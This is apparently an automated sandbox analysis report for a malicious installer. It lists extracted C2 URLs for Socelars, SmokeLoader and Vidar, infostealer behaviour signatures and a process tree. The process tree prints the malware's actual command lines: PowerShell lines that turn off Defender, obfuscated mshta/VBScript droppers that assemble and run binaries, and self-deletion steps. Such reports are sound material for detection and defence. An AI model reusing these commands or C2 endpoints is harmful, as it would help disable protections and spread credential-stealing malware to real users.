Resubmissions

01-12-2021 21:01

211201-zty57abbb5 10

26-11-2021 20:43

211126-zhx4raaae5 10

26-11-2021 20:43

211126-zhs5ssegfq 10

26-11-2021 20:41

211126-zgtpyaegfp 10

Analysis

  • max time kernel
    1635s
  • max time network
    1787s
  • platform
    windows10_x64
  • resource
    win10-en-20211104
  • submitted
    26-11-2021 20:43

General

  • Target

    setup_x86_x64_install.exe

  • Size

    11.6MB

  • MD5

    54703a1521ec4d0d257fd72bcb318971

  • SHA1

    40e376a63ff6866eadf5423b5b318fcc25758ffd

  • SHA256

    49bc7d63d4e82e6d645b37f79c7e689fbe0f8313152376b14e68d570c99afb82

  • SHA512

    6234c583ce20b05881872fd95ae71395ad2509eac1969f1a81b49ef972dec3a9414bf5c90adb243fa99374c838ac1f7ef5fb926778209f2004b8a92d1f12aed8

Malware Config

Extracted

Family

socelars

C2

http://www.ecgbg.com/

Extracted

Family

smokeloader

Version

2020

C2

http://membro.at/upload/

http://jeevanpunetha.com/upload/

http://misipu.cn/upload/

http://zavodooo.ru/upload/

http://targiko.ru/upload/

http://vues3d.com/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

48.7

Botnet

933

C2

https://mstdn.social/@anapa

https://mastodon.social/@mniami

Attributes
  • profile_id

    933

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata: ET MALWARE ClipBanker Variant Activity (POST)

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 4 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 9 IoCs
  • Drops Chrome extension 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 7 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 17 IoCs
  • Suspicious use of SetThreadContext 12 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 16 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Script User-Agent 3 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 10 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
  • Suspicious behavior: SetClipboardViewer 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1096
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      PID:2924
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:9304
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2664
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2656
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2476
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2448
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1852
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1448
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1340
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1268
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:940
                    • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                      "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2932
                      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:2696
                        • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\setup_install.exe
                          "C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\setup_install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:3512
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                            4⤵
                              PID:1608
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                                5⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1408
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                              4⤵
                                PID:3964
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                  5⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1752
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c Fri20bc562fa6acd.exe
                                4⤵
                                  PID:4044
                                  • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri20bc562fa6acd.exe
                                    Fri20bc562fa6acd.exe
                                    5⤵
                                    • Executes dropped EXE
                                    PID:1444
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c Fri20070cd68c3181d0.exe
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:312
                                  • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri20070cd68c3181d0.exe
                                    Fri20070cd68c3181d0.exe
                                    5⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:944
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd.exe /c taskkill /f /im chrome.exe
                                      6⤵
                                        PID:5444
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill /f /im chrome.exe
                                          7⤵
                                          • Kills process with taskkill
                                          PID:6784
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Fri2050c5d6de57ca396.exe
                                    4⤵
                                      PID:3588
                                      • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri2050c5d6de57ca396.exe
                                        Fri2050c5d6de57ca396.exe
                                        5⤵
                                        • Executes dropped EXE
                                        PID:1412
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c Fri20a252fe0d.exe
                                      4⤵
                                        PID:360
                                        • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri20a252fe0d.exe
                                          Fri20a252fe0d.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:2196
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Fri20405c77f8562ea6.exe
                                        4⤵
                                        • Suspicious use of WriteProcessMemory
                                        PID:1772
                                        • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri20405c77f8562ea6.exe
                                          Fri20405c77f8562ea6.exe
                                          5⤵
                                          • Executes dropped EXE
                                          PID:1192
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Fri2002bea00b158d.exe
                                        4⤵
                                          PID:1688
                                          • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri2002bea00b158d.exe
                                            Fri2002bea00b158d.exe
                                            5⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            PID:2292
                                            • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri2002bea00b158d.exe
                                              C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri2002bea00b158d.exe
                                              6⤵
                                              • Executes dropped EXE
                                              PID:4228
                                            • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri2002bea00b158d.exe
                                              C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri2002bea00b158d.exe
                                              6⤵
                                              • Executes dropped EXE
                                              PID:4660
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Fri2064de6352.exe
                                          4⤵
                                            PID:3012
                                            • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri2064de6352.exe
                                              Fri2064de6352.exe
                                              5⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:392
                                              • C:\Users\Admin\AppData\Roaming\225729.exe
                                                "C:\Users\Admin\AppData\Roaming\225729.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                PID:4532
                                              • C:\Users\Admin\AppData\Roaming\2137516.exe
                                                "C:\Users\Admin\AppData\Roaming\2137516.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Adds Run key to start application
                                                PID:4636
                                                • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                  "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:4644
                                              • C:\Users\Admin\AppData\Roaming\4490144.exe
                                                "C:\Users\Admin\AppData\Roaming\4490144.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:4876
                                              • C:\Users\Admin\AppData\Roaming\4432183.exe
                                                "C:\Users\Admin\AppData\Roaming\4432183.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                PID:4352
                                                • C:\Users\Admin\AppData\Roaming\8173822.exe
                                                  "C:\Users\Admin\AppData\Roaming\8173822.exe"
                                                  7⤵
                                                    PID:7556
                                                    • C:\Windows\SysWOW64\mshta.exe
                                                      "C:\Windows\System32\mshta.exe" VBsCrIpT: close ( CreatEobJecT ( "Wscript.sHElL"). RUn ( "cmd.eXe /q /C Type ""C:\Users\Admin\AppData\Roaming\8173822.exe"" > IjVy1zQHC.exE && STARt IjVY1ZQHC.exe -PcQVxYt3abConFhE00GVx & IF """"== """" for %f In ( ""C:\Users\Admin\AppData\Roaming\8173822.exe"" ) do taskkill /f -Im ""%~Nxf"" " , 0 ,TRUe ) )
                                                      8⤵
                                                        PID:8044
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "C:\Windows\System32\cmd.exe" /q /C Type "C:\Users\Admin\AppData\Roaming\8173822.exe" > IjVy1zQHC.exE && STARt IjVY1ZQHC.exe -PcQVxYt3abConFhE00GVx & IF ""== "" for %f In ( "C:\Users\Admin\AppData\Roaming\8173822.exe" ) do taskkill /f -Im "%~Nxf"
                                                          9⤵
                                                            PID:8908
                                                            • C:\Users\Admin\AppData\Local\Temp\IjVy1zQHC.exE
                                                              IjVY1ZQHC.exe -PcQVxYt3abConFhE00GVx
                                                              10⤵
                                                                PID:9144
                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                  "C:\Windows\System32\mshta.exe" VBsCrIpT: close ( CreatEobJecT ( "Wscript.sHElL"). RUn ( "cmd.eXe /q /C Type ""C:\Users\Admin\AppData\Local\Temp\IjVy1zQHC.exE"" > IjVy1zQHC.exE && STARt IjVY1ZQHC.exe -PcQVxYt3abConFhE00GVx & IF ""-PcQVxYt3abConFhE00GVx ""== """" for %f In ( ""C:\Users\Admin\AppData\Local\Temp\IjVy1zQHC.exE"" ) do taskkill /f -Im ""%~Nxf"" " , 0 ,TRUe ) )
                                                                  11⤵
                                                                    PID:752
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /q /C Type "C:\Users\Admin\AppData\Local\Temp\IjVy1zQHC.exE" > IjVy1zQHC.exE && STARt IjVY1ZQHC.exe -PcQVxYt3abConFhE00GVx & IF "-PcQVxYt3abConFhE00GVx "== "" for %f In ( "C:\Users\Admin\AppData\Local\Temp\IjVy1zQHC.exE" ) do taskkill /f -Im "%~Nxf"
                                                                      12⤵
                                                                        PID:6792
                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                      "C:\Windows\System32\mshta.exe" vbSCRipT: ClosE ( CReaTeObJEct ( "wScrIPt.SheLl" ). rUn ( "CMD.eXE /c eCho | sET /p = ""MZ"" > 7WSOMm15.O & Copy /Y /b 7WSOmm15.O + VhxP.cIR + xZPTSFdP.P+ I5TAV.YD + lDrQJSaX.V + V9P2QViR.UPZ DV1MA.QMF & sTArT odbcconf.exe /a { ReGsvR .\DV1mA.QMF } " , 0 , tRUe ) )
                                                                      11⤵
                                                                        PID:4684
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c eCho | sET /p = "MZ" > 7WSOMm15.O & Copy /Y /b 7WSOmm15.O + VhxP.cIR + xZPTSFdP.P+ I5TAV.YD + lDrQJSaX.V + V9P2QViR.UPZ DV1MA.QMF & sTArT odbcconf.exe /a { ReGsvR .\DV1mA.QMF }
                                                                          12⤵
                                                                            PID:2600
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /S /D /c" eCho "
                                                                              13⤵
                                                                                PID:7396
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /S /D /c" sET /p = "MZ" 1>7WSOMm15.O"
                                                                                13⤵
                                                                                  PID:8984
                                                                                • C:\Windows\SysWOW64\odbcconf.exe
                                                                                  odbcconf.exe /a { ReGsvR .\DV1mA.QMF }
                                                                                  13⤵
                                                                                  • Loads dropped DLL
                                                                                  PID:9864
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f -Im "8173822.exe"
                                                                            10⤵
                                                                            • Kills process with taskkill
                                                                            PID:8568
                                                                    • C:\Users\Admin\AppData\Roaming\1832386.exe
                                                                      "C:\Users\Admin\AppData\Roaming\1832386.exe"
                                                                      7⤵
                                                                        PID:7904
                                                                    • C:\Users\Admin\AppData\Roaming\8784948.exe
                                                                      "C:\Users\Admin\AppData\Roaming\8784948.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      PID:5068
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c Fri2000bef28b4.exe
                                                                  4⤵
                                                                  • Suspicious use of WriteProcessMemory
                                                                  PID:1064
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri2000bef28b4.exe
                                                                    Fri2000bef28b4.exe
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    PID:3596
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c Fri2060e5abb4.exe
                                                                  4⤵
                                                                    PID:1604
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri2060e5abb4.exe
                                                                      Fri2060e5abb4.exe
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Checks SCSI registry key(s)
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      • Suspicious behavior: MapViewOfSection
                                                                      PID:1920
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c Fri20dd1f5f1511478e4.exe
                                                                    4⤵
                                                                      PID:1084
                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS88A140D5\Fri20dd1f5f1511478e4.exe
                                                                        Fri20dd1f5f1511478e4.exe
                                                                        5⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:1844
                                                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                          6⤵
                                                                          • Executes dropped EXE
                                                                          PID:4412
                                                                          • C:\Users\Admin\AppData\Local\Temp\chrome.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\chrome.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:4544
                                                                            • C:\Windows\system32\WerFault.exe
                                                                              C:\Windows\system32\WerFault.exe -u -p 4544 -s 1492
                                                                              8⤵
                                                                              • Program crash
                                                                              PID:2288
                                                                          • C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:4624
                                                                            • C:\Users\Admin\AppData\Roaming\2012028.exe
                                                                              "C:\Users\Admin\AppData\Roaming\2012028.exe"
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious behavior: SetClipboardViewer
                                                                              PID:5788
                                                                            • C:\Users\Admin\AppData\Roaming\1993108.exe
                                                                              "C:\Users\Admin\AppData\Roaming\1993108.exe"
                                                                              8⤵
                                                                                PID:5768
                                                                              • C:\Users\Admin\AppData\Roaming\8757871.exe
                                                                                "C:\Users\Admin\AppData\Roaming\8757871.exe"
                                                                                8⤵
                                                                                  PID:4208
                                                                                  • C:\Users\Admin\AppData\Roaming\4283425.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\4283425.exe"
                                                                                    9⤵
                                                                                      PID:6312
                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                        "C:\Windows\System32\mshta.exe" VBsCrIpT: close ( CreatEobJecT ( "Wscript.sHElL"). RUn ( "cmd.eXe /q /C Type ""C:\Users\Admin\AppData\Roaming\4283425.exe"" > IjVy1zQHC.exE && STARt IjVY1ZQHC.exe -PcQVxYt3abConFhE00GVx & IF """"== """" for %f In ( ""C:\Users\Admin\AppData\Roaming\4283425.exe"" ) do taskkill /f -Im ""%~Nxf"" " , 0 ,TRUe ) )
                                                                                        10⤵
                                                                                          PID:8280
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /q /C Type "C:\Users\Admin\AppData\Roaming\4283425.exe" > IjVy1zQHC.exE && STARt IjVY1ZQHC.exe -PcQVxYt3abConFhE00GVx & IF ""== "" for %f In ( "C:\Users\Admin\AppData\Roaming\4283425.exe" ) do taskkill /f -Im "%~Nxf"
                                                                                            11⤵
                                                                                              PID:6836
                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                taskkill /f -Im "4283425.exe"
                                                                                                12⤵
                                                                                                • Kills process with taskkill
                                                                                                PID:8928
                                                                                        • C:\Users\Admin\AppData\Roaming\284557.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\284557.exe"
                                                                                          9⤵
                                                                                            PID:5700
                                                                                        • C:\Users\Admin\AppData\Roaming\6031721.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\6031721.exe"
                                                                                          8⤵
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:5900
                                                                                        • C:\Users\Admin\AppData\Roaming\5805918.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\5805918.exe"
                                                                                          8⤵
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:6012
                                                                                        • C:\Users\Admin\AppData\Roaming\8305562.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\8305562.exe"
                                                                                          8⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5760
                                                                                      • C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Checks processor information in registry
                                                                                        PID:4736
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im Worldoffer.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe" & del C:\ProgramData\*.dll & exit
                                                                                          8⤵
                                                                                            PID:7628
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /im Worldoffer.exe /f
                                                                                              9⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:7740
                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                              timeout /t 6
                                                                                              9⤵
                                                                                              • Delays execution with timeout.exe
                                                                                              PID:6828
                                                                                        • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4852
                                                                                        • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1600
                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                            "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                            8⤵
                                                                                              PID:5400
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                9⤵
                                                                                                  PID:4488
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                    ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                    10⤵
                                                                                                      PID:6240
                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                        11⤵
                                                                                                          PID:6456
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                            12⤵
                                                                                                              PID:7916
                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                            "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                            11⤵
                                                                                                              PID:4912
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                12⤵
                                                                                                                  PID:8448
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                    13⤵
                                                                                                                      PID:3332
